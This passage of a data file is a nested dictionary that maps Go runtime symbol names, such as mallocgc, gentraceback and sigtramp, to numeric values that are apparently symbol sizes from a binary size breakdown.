85}, 'checknonempty': {'value': 85}}}, '.gobytes.': {'children': {'4': {'value': 16}, '5': {'value': 13}, '6': {'value': 42}}}, 'Caller': {'value': 757}, 'FuncForPC': {'value': 70}, 'GOMAXPROCS': {'value': 188}, 'GOROOT': {'value': 133}, 'Gosched': {'value': 40}, 'MemProfileRate': {'value': 8}, 'SetFinalizer': {'value': 2034}, 'SetFinalizer.': {'children': {'func1': {'value': 63}, 'func2': {'value': 143}}}, '_ExternalCode': {'value': 48}, '_GC': {'value': 48}, '_LostExternalCode': {'value': 48}, '_System': {'value': 48}, '_VDSO': {'value': 48}, '_cgo_setenv': {'value': 8}, '_cgo_unsetenv': {'value': 8}, 'abort': {'value': 4}, 'acquireSudog': {'value': 918}, 'acquirep': {'value': 108}, 'acquirep1': {'value': 377}, 'addfinalizer': {'value': 648}, 'addrspace_vec': {'value': 1}, 'addspecial': {'value': 449}, 'adjustctxt': {'value': 100}, 'adjustdefers': {'value': 230}, 'adjustframe': {'value': 630}, 'adjustpointers': {'value': 557}, 'adjustsudogs': {'value': 69}, 'advanceEvacuationMark': {'value': 219}, 'aeshash': {'value': 20}, 'aeshash32': {'value': 51}, 'aeshash64': {'value': 52}, 'aeshashbody': {'value': 1349}, 'aeshashstr': {'value': 22}, 'aeskeysched': {'value': 128}, 'algarray': {'value': 224}, 'alginit': {'value': 210}, 'allfin': {'value': 8}, 'allgadd': {'value': 319}, 'allglen': {'value': 8}, 'allglock': {'value': 8}, 'allgs': {'value': 24}, 'allm': {'value': 8}, 'allocm': {'value': 678}, 'allocmcache': {'value': 166}, 'allp': {'value': 24}, 'allpLock': {'value': 8}, 'argc': {'value': 4}, 'args': {'value': 109}, 'argslice': {'value': 24}, 'argv': {'value': 8}, 'arm64_support_atomics': {'value': 1}, 'asmcgocall': {'value': 186}, 'asmcgocall.': {'children': {'args_stackmap': {'value': 10}}}, 'asminit': {'value': 1}, 'assertE2I': {'value': 222}, 'assertE2I2': {'value': 163}, 'atoi': {'value': 295}, 'atoi32': {'value': 119}, 'atomicstorep': {'value': 75}, 'atomicwb': {'value': 131}, 'badctxt': {'value': 41}, 'badmcall': {'value': 63}, 'badmcall2': {'value': 63}, 'badmorestackg0': {'value': 60}, 'badmorestackg0Msg': {'value': 16}, 'badmorestackgsignal': {'value': 60}, 'badmorestackgsignalMsg': {'value': 16}, 'badreflectcall': {'value': 66}, 'badsignal': {'value': 86}, 'badsystemstack': {'value': 60}, 'badsystemstackMsg': {'value': 16}, 'badunlockosthread': {'value': 63}, 'bbuckets': {'value': 8}, 'bgsweep': {'value': 305}, 'blockevent': {'value': 125}, 'blockprofilerate': {'value': 8}, 'blocksampled': {'value': 131}, 'bucketmem': {'value': 8}, 'buckhash': {'value': 8}, 'buildVersion': {'value': 16}, 'bulkBarrierBitmap': {'value': 442}, 'bulkBarrierPreWrite': {'value': 1275}, 'c128equal': {'value': 59}, 'c128hash': {'value': 110}, 'c64equal': {'value': 57}, 'c64hash': {'value': 110}, 'cachestats': {'value': 126}, 'call1024': {'value': 176}, 'call1024.': {'children': {'args_stackmap': {'value': 9}}}, 'call1048576': {'value': 198}, 'call1048576.': {'children': {'args_stackmap': {'value': 9}}}, 'call1073741824': {'value': 198}, 'call1073741824.': {'children': {'args_stackmap': {'value': 9}}}, 'call128': {'value': 173}, 'call128.': {'children': {'args_stackmap': {'value': 9}}}, 'call131072': {'value': 198}, 'call131072.': {'children': {'args_stackmap': {'value': 9}}}, 'call134217728': {'value': 198}, 'call134217728.': {'children': {'args_stackmap': {'value': 9}}}, 'call16384': {'value': 198}, 'call16384.': {'children': {'args_stackmap': {'value': 9}}}, 'call16777216': {'value': 198}, 'call16777216.': {'children': {'args_stackmap': {'value': 9}}}, 'call2048': {'value': 176}, 'call2048.': {'children': {'args_stackmap': {'value': 9}}}, 'call2097152': {'value': 198}, 'call2097152.': {'children': {'args_stackmap': {'value': 9}}}, 'call256': {'value': 176}, 'call256.': {'children': {'args_stackmap': {'value': 9}}}, 'call262144': {'value': 198}, 'call262144.': {'children': {'args_stackmap': {'value': 9}}}, 'call268435456': {'value': 198}, 'call268435456.': {'children': {'args_stackmap': {'value': 9}}}, 'call32': {'value': 126}, 'call32.': {'children': {'args_stackmap': {'value': 9}}}, 'call32768': {'value': 198}, 'call32768.': {'children': {'args_stackmap': {'value': 9}}}, 'call33554432': {'value': 198}, 'call33554432.': {'children': {'args_stackmap': {'value': 9}}}, 'call4096': {'value': 198}, 'call4096.': {'children': {'args_stackmap': {'value': 9}}}, 'call4194304': {'value': 198}, 'call4194304.': {'children': {'args_stackmap': {'value': 9}}}, 'call512': {'value': 176}, 'call512.': {'children': {'args_stackmap': {'value': 9}}}, 'call524288': {'value': 198}, 'call524288.': {'children': {'args_stackmap': {'value': 9}}}, 'call536870912': {'value': 198}, 'call536870912.': {'children': {'args_stackmap': {'value': 9}}}, 'call64': {'value': 126}, 'call64.': {'children': {'args_stackmap': {'value': 9}}}, 'call65536': {'value': 198}, 'call65536.': {'children': {'args_stackmap': {'value': 9}}}, 'call67108864': {'value': 198}, 'call67108864.': {'children': {'args_stackmap': {'value': 9}}}, 'call8192': {'value': 198}, 'call8192.': {'children': {'args_stackmap': {'value': 9}}}, 'call8388608': {'value': 198}, 'call8388608.': {'children': {'args_stackmap': {'value': 9}}}, 'callCgoMmap': {'value': 81}, 'callCgoMunmap': {'value': 58}, 'callCgoSigaction': {'value': 62}, 'callCgoSymbolizer': {'value': 125}, 'callers': {'value': 220}, 'callers.': {'children': {'func1': {'value': 171}}}, 'cansemacquire': {'value': 39}, 'casfrom_Gscanstatus': {'value': 1101}, 'casgstatus': {'value': 515}, 'casgstatus.': {'children': {'func1': {'value': 179}, 'func2': {'value': 253}}}, 'casp': {'value': 89}, 'castogscanstatus': {'value': 219}, 'cgoCheckBits': {'value': 237}, 'cgoCheckMemmove': {'value': 160}, 'cgoCheckSliceCopy': {'value': 216}, 'cgoCheckTypedBlock': {'value': 900}, 'cgoCheckTypedBlock.': {'children': {'func1': {'value': 86}}}, 'cgoCheckUsingType': {'value': 606}, 'cgoCheckWriteBarrier': {'value': 222}, 'cgoCheckWriteBarrier.': {'children': {'func1': {'value': 181}}}, 'cgoContextPCs': {'value': 211}, 'cgoHasExtraM': {'value': 1}, 'cgoIsGoPointer': {'value': 238}, 'cgoSigtramp': {'value': 187}, 'cgoSymbolizer': {'value': 8}, 'cgoTraceback': {'value': 8}, 'cgo_yield': {'value': 8}, 'cgocall': {'value': 234}, 'chanrecv': {'value': 1640}, 'chanrecv.': {'children': {'func1': {'value': 65}}}, 'chanrecv1': {'value': 53}, 'chanrecvpc': {'value': 8}, 'chansend': {'value': 1514}, 'chansend.': {'children': {'func1': {'value': 65}}}, 'chansend1': {'value': 63}, 'chansendpc': {'value': 8}, 'check': {'value': 1146}, 'checkASM': {'value': 29}, 'checkASM.': {'children': {'args_stackmap': {'value': 10}}}, 'checkdead': {'value': 1181}, 'checkmcount': {'value': 184}, 'class_to_allocnpages': {'value': 67}, 'class_to_divmagic': {'value': 402}, 'class_to_size': {'value': 134}, 'clearCheckmarks': {'value': 307}, 'clearpools': {'value': 351}, 'clone': {'value': 129}, 'closechan': {'value': 648}, 'closefd': {'value': 29}, 'closeonexec': {'value': 26}, 'cmpstring': {'value': 30}, 'concatstring2': {'value': 108}, 'concatstring3': {'value': 111}, 'concatstring4': {'value': 114}, 'concatstring5': {'value': 114}, 'concatstrings': {'value': 730}, 'contains': {'value': 101}, 'convT2E': {'value': 135}, 'convT2E32': {'value': 117}, 'convT2Enoptr': {'value': 138}, 'convT2Eslice': {'value': 171}, 'convT2Estring': {'value': 159}, 'convT2I64': {'value': 125}, 'copystack': {'value': 830}, 'cpuinit': {'value': 463}, 'cpuprof': {'value': 8040}, 'cputicks': {'value': 32}, 'crash': {'value': 36}, 'crashing': {'value': 4}, 'createfing': {'value': 106}, 'dbgvars': {'value': 24}, 'deadlock': {'value': 8}, 'debug': {'value': 60}, 'debugCallCheck': {'value': 225}, 'debugCallCheck.': {'children': {'func1': {'value': 508}}}, 'debugCallPanicked': {'value': 51}, 'debugCallV1': {'value': 649}, 'debugCallWrap': {'value': 171}, 'debugCallWrap.': {'children': {'func1': {'value': 96}}}, 'debuglock': {'value': 8}, 'decoderune': {'value': 454}, 'deductSweepCredit': {'value': 370}, 'deferType': {'value': 8}, 'deferproc': {'value': 289}, 'deferreturn': {'value': 280}, 'deltimer': {'value': 529}, 'didothers': {'value': 1}, 'dieFromSignal': {'value': 151}, 'divideError': {'value': 16}, 'dopanic_m': {'value': 904}, 'dropm': {'value': 233}, 'duffcopy': {'value': 897}, 'duffzero': {'value': 305}, 'dumpregs': {'value': 1848}, 'earlycgocallback': {'value': 24}, 'efaceeq': {'value': 310}, 'emptymspan': {'value': 152}, 'encoderune': {'value': 337}, 'entersyscall': {'value': 48}, 'entersyscall_gcwait': {'value': 229}, 'entersyscall_sysmon': {'value': 117}, 'entersyscallblock': {'value': 431}, 'entersyscallblock.': {'children': {'func1': {'value': 308}, 'func2': {'value': 308}}}, 'entersyscallblock_handoff': {'value': 104}, 'envs': {'value': 24}, 'epfd': {'value': 4}, 'epollcreate': {'value': 16}, 'epollcreate1': {'value': 16}, 'epollctl': {'value': 29}, 'epollwait': {'value': 37}, 'eqslice': {'value': 68}, 'errorString.': {'children': {'Error': {'value': 120}}}, 'evacuate': {'value': 1635}, 'evacuate_fast32': {'value': 1054}, 'evacuate_fast64': {'value': 1193}, 'evacuate_faststr': {'value': 1143}, 'execLock': {'value': 48}, 'execute': {'value': 365}, 'exit': {'value': 12}, 'exitThread': {'value': 27}, 'exitsyscall': {'value': 577}, 'exitsyscall0': {'value': 476}, 'exitsyscallfast': {'value': 303}, 'exitsyscallfast.': {'children': {'func1': {'value': 167}}}, 'exitsyscallfast_pidle': {'value': 216}, 'exitsyscallfast_reacquired': {'value': 175}, 'exitsyscallfast_reacquired.': {'children': {'func1': {'value': 83}}}, 'expandCgoFrames': {'value': 794}, 'extendRandom': {'value': 226}, 'extraMCount': {'value': 4}, 'extraMWaiters': {'value': 4}, 'extram': {'value': 8}, 'f32equal': {'value': 34}, 'f32hash': {'value': 281}, 'f64equal': {'value': 35}, 'f64hash': {'value': 283}, 'faketime': {'value': 8}, 'fastexprand': {'value': 378}, 'fastlog2Table': {'value': 264}, 'fastrand': {'value': 68}, 'fatalpanic': {'value': 169}, 'fatalpanic.': {'children': {'func1': {'value': 192}, 'func2': {'value': 58}}}, 'fatalthrow': {'value': 106}, 'fatalthrow.': {'children': {'func1': {'value': 144}}}, 'finalizer1': {'value': 5}, 'finc': {'value': 8}, 'findObject': {'value': 962}, 'findfunc': {'value': 371}, 'findfunctab': {'value': 2648}, 'findmoduledatap': {'value': 60}, 'findnull': {'value': 188}, 'findrunnable': {'value': 2938}, 'findsghi': {'value': 79}, 'fing': {'value': 8}, 'fingCreate': {'value': 4}, 'fingRunning': {'value': 1}, 'fingwait': {'value': 1}, 'fingwake': {'value': 1}, 'finishsweep_m': {'value': 71}, 'finlock': {'value': 8}, 'finptrmask': {'value': 64}, 'finq': {'value': 8}, 'firstmoduledata': {'value': 456}, 'float64frombits': {'value': 13}, 'floatError': {'value': 16}, 'flushmcache': {'value': 128}, 'fmtNSAsMS': {'value': 389}, 'forEachP': {'value': 910}, 'forcegc': {'value': 24}, 'forcegchelper': {'value': 282}, 'forcegcperiod': {'value': 8}, 'framepointer_enabled': {'value': 1}, 'freeSomeWbufs': {'value': 223}, 'freeSomeWbufs.': {'children': {'func1': {'value': 233}}}, 'freeStackSpans': {'value': 412}, 'freedefer': {'value': 507}, 'freedefer.': {'children': {'func1': {'value': 388}}}, 'freedeferfn': {'value': 63}, 'freedeferpanic': {'value': 63}, 'freemcache': {'value': 90}, 'freemcache.': {'children': {'func1': {'value': 183}}}, 'freespecial': {'value': 349}, 'freezetheworld': {'value': 166}, 'freezing': {'value': 4}, 'funcPC': {'value': 21}, 'funcdata': {'value': 217}, 'funcfile': {'value': 173}, 'funcline': {'value': 113}, 'funcline1': {'value': 393}, 'funcname': {'value': 126}, 'funcnameFromNameoff': {'value': 140}, 'funcspdelta': {'value': 357}, 'futex': {'value': 40}, 'futexsleep': {'value': 202}, 'futexwakeup': {'value': 155}, 'futexwakeup.': {'children': {'func1': {'value': 164}}}, 'fwdSig': {'value': 520}, 'g0': {'value': 376}, 'gStatusStrings': {'value': 144}, 'gcAssistAlloc': {'value': 620}, 'gcAssistAlloc.': {'children': {'func1': {'value': 68}}}, 'gcAssistAlloc1': {'value': 903}, 'gcBgMarkStartWorkers': {'value': 201}, 'gcBgMarkWorker': {'value': 1239}, 'gcBgMarkWorker.': {'children': {'func1': {'value': 117}, 'func2': {'value': 459}}}, 'gcBitsArenas': {'value': 40}, 'gcBlackenEnabled': {'value': 4}, 'gcBlackenPromptly': {'value': 1}, 'gcController': {'value': 152}, 'gcDrain': {'value': 1132}, 'gcDrainN': {'value': 525}, 'gcDumpObject': {'value': 1163}, 'gcFlushBgCredit': {'value': 457}, 'gcMark': {'value': 742}, 'gcMarkDone': {'value': 639}, 'gcMarkDone.': {'children': {'func1': {'value': 62}, 'func1.': {'children': {'1': {'value': 82}}}}}, 'gcMarkRootCheck': {'value': 682}, 'gcMarkRootPrepare': {'value': 408}, 'gcMarkTermination': {'value': 2866}, 'gcMarkTermination.': {'children': {'func1': {'value': 62}, 'func2': {'value': 440}, 'func3': {'value': 55}}}, 'gcMarkTinyAllocs': {'value': 269}, 'gcParkAssist': {'value': 349}, 'gcResetMarkState': {'value': 167}, 'gcSetTriggerRatio': {'value': 1011}, 'gcStart': {'value': 1416}, 'gcStart.': {'children': {'func1': {'value': 48}, 'func2': {'value': 83}}}, 'gcSweep': {'value': 417}, 'gcWaitOnMark': {'value': 185}, 'gcWakeAllAssists': {'value': 133}, 'gcWriteBarrier': {'value': 249}, 'gcallers': {'value': 169}, 'gcbss': {'value': 712}, 'gcd': {'value': 29}, 'gcdata': {'value': 468}, 'gcenable': {'value': 138}, 'gchelper': {'value': 254}, 'gchelperstart': {'value': 133}, 'gcinit': {'value': 207}, 'gcmarknewobject': {'value': 200}, 'gcpercent': {'value': 4}, 'gcphase': {'value': 4}, 'gcprocs': {'value': 150}, 'gcstopm': {'value': 277}, 'gentraceback': {'value': 7313}, 'getArgInfo': {'value': 484}, 'getRandomData': {'value': 336}, 'getStackMap': {'value': 2068}, 'getargp': {'value': 11}, 'getempty': {'value': 550}, 'getempty.': {'children': {'func1': {'value': 105}}}, 'getfull': {'value': 769}, 'getitab': {'value': 901}, 'getproccount': {'value': 257}, 'getsig': {'value': 78}, 'gettid': {'value': 12}, 'gfget': {'value': 486}, 'gfget.': {'children': {'func1': {'value': 89}}}, 'gfpurge': {'value': 316}, 'gfput': {'value': 519}, 'globalAlloc': {'value': 24}, 'globrunqget': {'value': 298}, 'goargs': {'value': 293}, 'goenvs': {'value': 48}, 'goenvs_unix': {'value': 327}, 'goexit': {'value': 7}, 'goexit0': {'value': 732}, 'goexit1': {'value': 81}, 'gogetenv': {'value': 298}, 'gogo': {'value': 87}, 'gomaxprocs': {'value': 4}, 'gopanic': {'value': 1389}, 'gopark': {'value': 318}, 'goparkunlock': {'value': 100}, 'gopreempt_m': {'value': 79}, 'goready': {'value': 109}, 'goready.': {'children': {'func1': {'value': 73}}}, 'gorecover': {'value': 72}, 'goroutineheader': {'value': 709}, 'goschedImpl': {'value': 642}, 'gosched_m': {'value': 79}, 'gostring': {'value': 198}, 'gostringnocopy': {'value': 81}, 'gosweepone': {'value': 109}, 'gosweepone.': {'children': {'func1': {'value': 72}}}, 'greyobject': {'value': 1299}, 'growWork': {'value': 163}, 'growWork_fast32': {'value': 163}, 'growWork_fast64': {'value': 163}, 'growWork_faststr': {'value': 163}, 'growslice': {'value': 1758}, 'gwrite': {'value': 317}, 'handlingSig': {'value': 260}, 'handoff': {'value': 180}, 'handoffp': {'value': 752}, 'hashGrow': {'value': 545}, 'hashkey': {'value': 32}, 'haveexperiment': {'value': 502}, 'heapBits.': {'children': {'clearCheckmarkSpan': {'value': 167}, 'forward': {'value': 173}, 'forwardOrBoundary': {'value': 180}, 'initCheckmarkSpan': {'value': 311}, 'initSpan': {'value': 520}, 'nextArena': {'value': 108}}}, 'heapBitsSetType': {'value': 2613}, 'heapBitsSetTypeGCProg': {'value': 872}, 'heapminimum': {'value': 8}, 'helpgc': {'value': 397}, 'hexdumpWords': {'value': 590}, 'hexdumpWords.': {'children': {'func1': {'value': 147}}}, 'ifaceeq': {'value': 314}, 'inForkedChild': {'value': 1}, 'inHeapOrStack': {'value': 134}, 'inVDSOPage': {'value': 98}, 'incidlelocked': {'value': 107}, 'index': {'value': 246}, 'indexError': {'value': 16}, 'inf': {'value': 8}, 'init': {'value': 264}, 'init.': {'children': {'0': {'value': 99}, '1': {'value': 1}, '2': {'value': 138}, '3': {'value': 114}, '4': {'value': 70}, '5': {'value': 1}}}, 'initAlgAES': {'value': 204}, 'initCheckmarks': {'value': 307}, 'initSigmask': {'value': 8}, 'initdone.': {'value': 1}, 'initsig': {'value': 520}, 'injectglist': {'value': 395}, 'interequal': {'value': 107}, 'interhash': {'value': 384}, 'intstring': {'value': 287}, 'isIntel': {'value': 1}, 'isSystemGoroutine': {'value': 230}, 'isarchive': {'value': 1}, 'iscgo': {'value': 1}, 'islibrary': {'value': 1}, 'itabAdd': {'value': 332}, 'itabLock': {'value': 8}, 'itabTable': {'value': 8}, 'itabTableInit': {'value': 4112}, 'itabsinit': {'value': 233}, 'iterate_itabs': {'value': 121}, 'itoaDiv': {'value': 218}, 'jmpdefer': {'value': 29}, 'largeAlloc': {'value': 397}, 'lastmoduledatap': {'value': 8}, 'lfenceBeforeRdtsc': {'value': 1}, 'lfnodeValidate': {'value': 180}, 'lock': {'value': 413}, 'lockextra': {'value': 190}, 'm0': {'value': 832}, 'mProf': {'value': 8}, 'mProf_Flush': {'value': 104}, 'mProf_FlushLocked': {'value': 228}, 'mProf_Free': {'value': 175}, 'mProf_Malloc': {'value': 461}, 'mProf_Malloc.': {'children': {'func1': {'value': 68}}}, 'mProf_NextCycle': {'value': 120}, 'mSpanStateNames': {'value': 24}, 'mSysStatDec': {'value': 188}, 'mSysStatInc': {'value': 182}, 'madvise': {'value': 24}, 'main': {'value': 852}, 'main.': {'children': {'func1': {'value': 71}, 'func2': {'value': 60}}}, 'mainPC': {'value': 8}, 'mainStarted': {'value': 1}, 'main_init_done': {'value': 8}, 'makeBucketArray': {'value': 550}, 'makechan': {'value': 613}, 'makemap': {'value': 498}, 'makemap_small': {'value': 141}, 'makeslice': {'value': 252}, 'malg': {'value': 199}, 'malg.': {'children': {'func1': {'value': 88}}}, 'mallocgc': {'value': 2480}, 'mallocgc.': {'children': {'func1': {'value': 100}}}, 'mallocinit': {'value': 592}, 'mapaccess1_fast32': {'value': 415}, 'mapaccess1_fast64': {'value': 417}, 'mapaccess2': {'value': 559}, 'mapaccess2_fast32': {'value': 434}, 'mapaccess2_fast64': {'value': 436}, 'mapaccessK': {'value': 531}, 'mapassign': {'value': 1418}, 'mapassign_fast32': {'value': 813}, 'mapassign_fast64ptr': {'value': 850}, 'mapassign_faststr': {'value': 1028}, 'mapiterinit': {'value': 689}, 'mapiternext': {'value': 1329}, 'markBitsForAddr': {'value': 217}, 'markroot': {'value': 879}, 'markroot.': {'children': {'func1': {'value': 234}}}, 'markrootBlock': {'value': 164}, 'markrootFreeGStacks': {'value': 313}, 'markrootSpans': {'value': 572}, 'maxElems': {'value': 264}, 'maxstacksize': {'value': 8}, 'mbuckets': {'value': 8}, 'mcall': {'value': 102}, 'mcommoninit': {'value': 490}, 'memclrHasPointers': {'value': 81}, 'memclrNoHeapPointers': {'value': 641}, 'memequal': {'value': 36}, 'memequal0': {'value': 6}, 'memequal128': {'value': 38}, 'memequal16': {'value': 22}, 'memequal32': {'value': 20}, 'memequal64': {'value': 22}, 'memequal8': {'value': 21}, 'memequal_varlen': {'value': 35}, 'memhash': {'value': 768}, 'memhash0': {'value': 11}, 'memhash128': {'value': 89}, 'memhash16': {'value': 89}, 'memhash32': {'value': 105}, 'memhash64': {'value': 102}, 'memhash8': {'value': 89}, 'memhash_varlen': {'value': 70}, 'memmove': {'value': 1723}, 'memoryError': {'value': 16}, 'memstats': {'value': 5976}, 'mexit': {'value': 572}, 'mheap_': {'value': 13944}, 'mhelpgc': {'value': 24}, 'mincore': {'value': 27}, 'minit': {'value': 76}, 'minitSignalMask': {'value': 249}, 'minitSignalStack': {'value': 350}, 'minitSignals': {'value': 53}, 'mmap': {'value': 367}, 'mmap.': {'children': {'func1': {'value': 118}}}, 'moduledataverify': {'value': 86}, 'moduledataverify1': {'value': 1685}, 'modulesSlice': {'value': 8}, 'modulesinit': {'value': 637}, 'morestack': {'value': 149}, 'morestack_noctxt': {'value': 10}, 'morestackc': {'value': 41}, 'mpreinit': {'value': 132}, 'mput': {'value': 89}, 'msigrestore': {'value': 55}, 'msigsave': {'value': 63}, 'mspinning': {'value': 21}, 'mstart': {'value': 140}, 'mstart1': {'value': 303}, 'mstartm0': {'value': 93}, 'munmap': {'value': 160}, 'munmap.': {'children': {'func1': {'value': 68}}}, 'mutexprofilerate': {'value': 8}, 'name.': {'children': {'name': {'value': 73}, 'pkgPath': {'value': 239}, 'tag': {'value': 142}, 'tagLen': {'value': 79}}}, 'nanotime': {'value': 190}, 'ncpu': {'value': 4}, 'needaddgcproc': {'value': 150}, 'needm': {'value': 324}, 'netpoll': {'value': 545}, 'netpollInited': {'value': 4}, 'netpollWaiters': {'value': 4}, 'netpollblock': {'value': 338}, 'netpollblockcommit': {'value': 75}, 'netpollclose': {'value': 115}, 'netpollgoready': {'value': 89}, 'netpollinit': {'value': 212}, 'netpollopen': {'value': 143}, 'netpollready': {'value': 260}, 'netpollunblock': {'value': 152}, 'newAllocBits': {'value': 70}, 'newArenaMayUnlock': {'value': 230}, 'newBucket': {'value': 207}, 'newMarkBits': {'value': 756}, 'newarray': {'value': 236}, 'newdefer': {'value': 511}, 'newdefer.': {'children': {'func1': {'value': 452}, 'func2': {'value': 320}}}, 'newextram': {'value': 140}, 'newm': {'value': 325}, 'newm1': {'value': 317}, 'newmHandoff': {'value': 40}, 'newobject': {'value': 83}, 'newosproc': {'value': 460}, 'newproc': {'value': 120}, 'newproc.': {'children': {'func1': {'value': 96}}}, 'newproc1': {'value': 1308}, 'newprocs': {'value': 4}, 'newstack': {'value': 3422}, 'nextMarkBitArenaEpoch': {'value': 190}, 'nextSample': {'value': 70}, 'nilinterequal': {'value': 107}, 'nilinterhash': {'value': 380}, 'noSignalStack': {'value': 139}, 'no_pointers_stackmap': {'value': 8}, 'notesleep': {'value': 244}, 'notetsleep': {'value': 140}, 'notetsleep_internal': {'value': 426}, 'notetsleepg': {'value': 149}, 'notewakeup': {'value': 192}, 'oneBitCount': {'value': 256}, 'oneNewExtraM': {'value': 479}, 'oneptrmask': {'value': 1}, 'open': {'value': 44}, 'osinit': {'value': 60}, 'osyield': {'value': 8}, 'overflowError': {'value': 16}, 'panicCheckMalloc': {'value': 165}, 'panicdivide': {'value': 103}, 'panicdottypeE': {'value': 226}, 'panicdottypeI': {'value': 256}, 'panicfloat': {'value': 103}, 'panicindex': {'value': 297}, 'panicking': {'value': 4}, 'paniclk': {'value': 8}, 'panicmem': {'value': 103}, 'panicoverflow': {'value': 103}, 'panicslice': {'value': 297}, 'panicwrap': {'value': 1023}, 'park_m': {'value': 487}, 'parkunlock_c': {'value': 65}, 'parsedebugvars': {'value': 856}, 'pcdatavalue': {'value': 161}, 'pclntab': {'value': 445833}, 'pcvalue': {'value': 1412}, 'persistentalloc': {'value': 160}, 'persistentalloc.': {'children': {'func1': {'value': 99}}}, 'persistentalloc1': {'value': 733}, 'physPageSize': {'value': 8}, 'pidleput': {'value': 148}, 'pinnedTypemaps': {'value': 24}, 'plainError.': {'children': {'Error': {'value': 21}}}, 'pollFractionalWorkerExit': {'value': 181}, 'pollWork': {'value': 213}, 'pollcache': {'value': 16}, 'poolcleanup': {'value': 8}, 'preemptall': {'value': 122}, 'prepareFreeWorkbufs': {'value': 161}, 'preprintpanics': {'value': 500}, 'preprintpanics.': {'children': {'func1': {'value': 95}}}, 'printAncestorTraceback': {'value': 539}, 'printAncestorTracebackFuncInfo': {'value': 1396}, 'printBacklog': {'value': 512}, 'printBacklogIndex': {'value': 8}, 'printCgoTraceback': {'value': 304}, 'printOneCgoTraceback': {'value': 498}, 'printany': {'value': 2024}, 'printbool': {'value': 107}, 'printcomplex': {'value': 141}, 'printcreatedby': {'value': 196}, 'printcreatedby1': {'value': 443}, 'printeface': {'value': 166}, 'printfloat': {'value': 669}, 'printhex': {'value': 256}, 'printint': {'value': 100}, 'printlock': {'value': 120}, 'printnl': {'value': 71}, 'printpanics': {'value': 248}, 'printpointer': {'value': 60}, 'printslice': {'value': 200}, 'printsp': {'value': 71}, 'printstring': {'value': 140}, 'printuint': {'value': 252}, 'printunlock': {'value': 98}, 'procAuxv': {'value': 24}, 'processorVersionInfo': {'value': 4}, 'procresize': {'value': 2682}, 'procyield': {'value': 12}, 'prof': {'value': 8}, 'profilealloc': {'value': 92}, 'proflock': {'value': 8}, 'progToPointerMask': {'value': 294}, 'publicationBarrier': {'value': 1}, 'publicationBarrier.': {'children': {'args_stackmap': {'value': 8}}}, 'purgecachedstats': {'value': 173}, 'putempty': {'value': 88}, 'putfull': {'value': 88}, 'queuefinalizer': {'value': 568}, 'raise': {'value': 21}, 'raisebadsignal': {'value': 309}, 'raiseproc': {'value': 21}, 'rawbyteslice': {'value': 364}, 'rawruneslice': {'value': 428}, 'rawstring': {'value': 134}, 'rawstringtmp': {'value': 165}, 'read': {'value': 38}, 'readgogc': {'value': 175}, 'readvarint': {'value': 92}, 'ready': {'value': 646}, 'readyWithTime': {'value': 103}, 'recordForPanic': {'value': 329}, 'recordspan': {'value': 512}, 'recovery': {'value': 329}, 'recv': {'value': 434}, 'recvDirect': {'value': 137}, 'reentersyscall': {'value': 562}, 'reentersyscall.': {'children': {'func1': {'value': 252}}}, 'reflectOffs': {'value': 32}, 'reflectOffsLock': {'value': 62}, 'reflectOffsUnlock': {'value': 62}, 'reflectcall': {'value': 475}, 'reflectcall.': {'children': {'args_stackmap': {'value': 9}}}, 'reflectcallmove': {'value': 152}, 'releaseSudog': {'value': 924}, 'releasep': {'value': 550}, 'removefinalizer': {'value': 181}, 'removespecial': {'value': 422}, 'resetspinning': {'value': 182}, 'resolveNameOff': {'value': 736}, 'resolveTypeOff': {'value': 824}, 'restartg': {'value': 467}, 'retake': {'value': 596}, 'return0': {'value': 6}, 'round2': {'value': 35}, 'rt0_go': {'value': 318}, 'rt_sigaction': {'value': 32}, 'rtsigprocmask': {'value': 46}, 'runGCProg': {'value': 1603}, 'runSafePointFn': {'value': 193}, 'runfinq': {'value': 1034}, 'runningPanicDefers': {'value': 4}, 'runqempty': {'value': 53}, 'runqget': {'value': 168}, 'runqgrab': {'value': 335}, 'runqput': {'value': 251}, 'runqputslow': {'value': 541}, 'runqsteal': {'value': 235}, 'runtimeInitTime': {'value': 8}, 'save': {'value': 65}, 'saveAncestors': {'value': 867}, 'saveblockevent': {'value': 438}, 'scanblock': {'value': 302}, 'scanframeworker': {'value': 226}, 'scang': {'value': 953}, 'scanobject': {'value': 952}, 'scanstack': {'value': 1181}, 'scanstack.': {'children': {'func1': {'value': 83}}}, 'scavengeTreapNode': {'value': 294}, 'scavengelist': {'value': 332}, 'scavengetreap': {'value': 230}, 'sched': {'value': 296}, 'sched_getaffinity': {'value': 27}, 'schedinit': {'value': 566}, 'schedtrace': {'value': 2831}, 'schedule': {'value': 860}, 'semacquire': {'value': 74}, 'semacquire1': {'value': 704}, 'semrelease': {'value': 65}, 'semrelease1': {'value': 456}, 'semtable': {'value': 16064}, 'send': {'value': 283}, 'sendDirect': {'value': 137}, 'setThreadCPUProfiler': {'value': 218}, 'setg': {'value': 15}, 'setitimer': {'value': 22}, 'setprofilebucket': {'value': 185}, 'setsSP': {'value': 126}, 'setsig': {'value': 314}, 'setsigstack': {'value': 130}, 'settls': {'value': 66}, 'shade': {'value': 202}, 'shouldPushSigpanic': {'value': 175}, 'showframe': {'value': 175}, 'showfuncinfo': {'value': 555}, 'shrinkstack': {'value': 375}, 'siftdownTimer': {'value': 464}, 'siftupTimer': {'value': 274}, 'sig': {'value': 72}, 'sigNotOnStack': {'value': 139}, 'sigaction': {'value': 350}, 'sigaction.': {'children': {'func1': {'value': 99}}}, 'sigaltstack': {'value': 39}, 'sigblock': {'value': 57}, 'sigfwd': {'value': 34}, 'sigfwdgo': {'value': 441}, 'sighandler': {'value': 1899}, 'signalDuringFork': {'value': 139}, 'signalsOK': {'value': 1}, 'signalstack': {'value': 96}, 'sigpanic': {'value': 766}, 'sigpipe': {'value': 90}, 'sigprocmask': {'value': 64}, 'sigprof': {'value': 1420}, 'sigprofCallers': {'value': 256}, 'sigprofCallersUse': {'value': 4}, 'sigprofNonGo': {'value': 135}, 'sigprofNonGoPC': {'value': 145}, 'sigreturn': {'value': 11}, 'sigsend': {'value': 397}, 'sigset_all': {'value': 8}, 'sigtable': {'value': 1560}, 'sigtramp': {'value': 107}, 'sigtrampgo': {'value': 1214}, 'size_to_class128': {'value': 249}, 'size_to_class8': {'value': 129}, 'sizeof_C_MStats': {'value': 8}, 'skipPC': {'value': 8}, 'skipPleaseUseCallersFrames': {'value': 256}, 'sliceError': {'value': 16}, 'slicebytetostring': {'value': 228}, 'slicerunetostring': {'value': 500}, 'spanOfHeap': {'value': 129}, 'stackLarge': {'value': 568}, 'stackalloc': {'value': 794}, 'stackcache_clear': {'value': 215}, 'stackcacherefill': {'value': 235}, 